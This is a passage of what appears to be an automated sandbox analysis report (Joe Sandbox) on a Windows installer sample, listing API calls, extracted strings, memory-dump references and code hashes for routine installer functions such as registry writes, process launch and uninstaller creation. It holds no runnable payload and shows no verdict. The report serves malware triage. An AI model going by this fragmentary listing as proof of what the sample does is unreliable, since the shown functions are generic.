                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                  • SendMessageW.USER32(00000000), ref: 00404251
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                  • SetCursor.USER32(00000000), ref: 004042D2
                                                  • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                  • SetCursor.USER32(00000000), ref: 004042F6
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                  • String ID: @%F$N$open
                                                  • API String ID: 3928313111-3849437375
                                                  • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                  • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                  • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                  • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                  APIs
                                                  • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                  • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                  • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                    • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                    • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                  • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                  • wsprintfA.USER32 ref: 00406B4D
                                                  • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                    • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                    • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                  • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                  • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                  • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                  • String ID: F$%s=%s$NUL$[Rename]
                                                  • API String ID: 565278875-1653569448
                                                  • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                  • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                  • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                  • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                  • DeleteObject.GDI32(?), ref: 004010F6
                                                  • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                  • SelectObject.GDI32(00000000,?), ref: 00401149
                                                  • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                  • DeleteObject.GDI32(?), ref: 0040116E
                                                  • EndPaint.USER32(?,?), ref: 00401177
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                  • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                  • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                  • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                  • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                  • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  Strings
                                                  • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                  • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                  • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                  • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                  • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                  • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CloseCreateValuewvsprintf
                                                  • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                  • API String ID: 1641139501-220328614
                                                  • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                  • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                  • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                  • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                  • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                  Strings
                                                  • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                  • String ID: created uninstaller: %d, "%s"
                                                  • API String ID: 3294113728-3145124454
                                                  • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                  • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                  • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                  • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                  APIs
                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                  • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                  • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                  • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                  • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                  • API String ID: 3734993849-2769509956
                                                  • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                  • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                  • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                  • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                  • GetSysColor.USER32(00000000), ref: 00403E00
                                                  • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                  • SetBkMode.GDI32(?,?), ref: 00403E18
                                                  • GetSysColor.USER32(?), ref: 00403E2B
                                                  • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                  • DeleteObject.GDI32(?), ref: 00403E55
                                                  • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                  • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                  • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                  • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                  • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                  Strings
                                                  • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                  • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                  • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                  • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                  • API String ID: 1033533793-945480824
                                                  • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                  • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                  • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                  • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                  APIs
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                    • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                    • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                  Strings
                                                  • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                  • Exec: success ("%s"), xrefs: 00402263
                                                  • Exec: command="%s", xrefs: 00402241
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                  • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                  • API String ID: 2014279497-3433828417
                                                  • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                  • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                  • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                  • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                  • GetMessagePos.USER32 ref: 00404871
                                                  • ScreenToClient.USER32(?,?), ref: 00404889
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                  • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                  • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                  • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                  • MulDiv.KERNEL32(00054E00,00000064,?), ref: 00403295
                                                  • wsprintfW.USER32 ref: 004032A5
                                                  • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 0040329F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
